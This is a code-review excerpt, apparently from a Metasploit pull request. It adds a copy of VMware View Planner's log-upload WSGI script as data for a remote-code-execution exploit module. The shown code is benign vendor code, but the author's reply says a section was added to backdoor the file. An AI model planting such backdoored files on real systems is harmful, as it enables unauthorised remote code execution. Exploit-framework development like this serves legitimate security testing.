data/exploits/vmware_view_planner_4_6_uploadlog_rce/log_upload_wsgi.py

```diff
@@ -0,0 +1,107 @@
+#! /usr/bin/env python3
+import cgi
+import os,sys
+import logging
+import json
+
+WORKLOAD_LOG_ZIP_ARCHIVE_FILE_NAME = "workload_log_{}.zip"
+
+class LogFileJson:
+    """ Defines format to upload log file in harness
+
+    Arguments:
+    itrLogPath : log path provided by harness to store log data
+    logFileType : Type of log file defined in api.agentlogFileType
+    workloadID [OPTIONAL] : workload id, if log file is workload specific
+
+    """
+    def __init__(self, itrLogPath, logFileType, workloadID = None):
+        self.itrLogPath = itrLogPath
+        self.logFileType = logFileType
+        self.workloadID = workloadID
+
+    def to_json(self):
+        return json.dumps(self.__dict__)
+
+    @classmethod
+    def from_json(cls, json_str):
+        json_dict = json.loads(json_str)
+        return cls(**json_dict)
+
+class agentlogFileType():
+    """ Defines various log file types to be uploaded by agent
+
+    """
+    WORKLOAD_ZIP_LOG = "workloadLogsZipFile"
+
+try:
+    # TO DO: Puth path in some config
+    logging.basicConfig(filename="/etc/httpd/html/logs/uploader.log",filemode='a', level=logging.ERROR)
+except:
+    # In case write permission is not available in log folder.

```

Comment:
Did you want to put an error message here?

Reply:
See https://github.com/rapid7/metasploit-framework/pull/14875#discussion_r596441826, these comments are from the original copy of the file from the manufacturer, I just added a small section to allow for backdooring the file.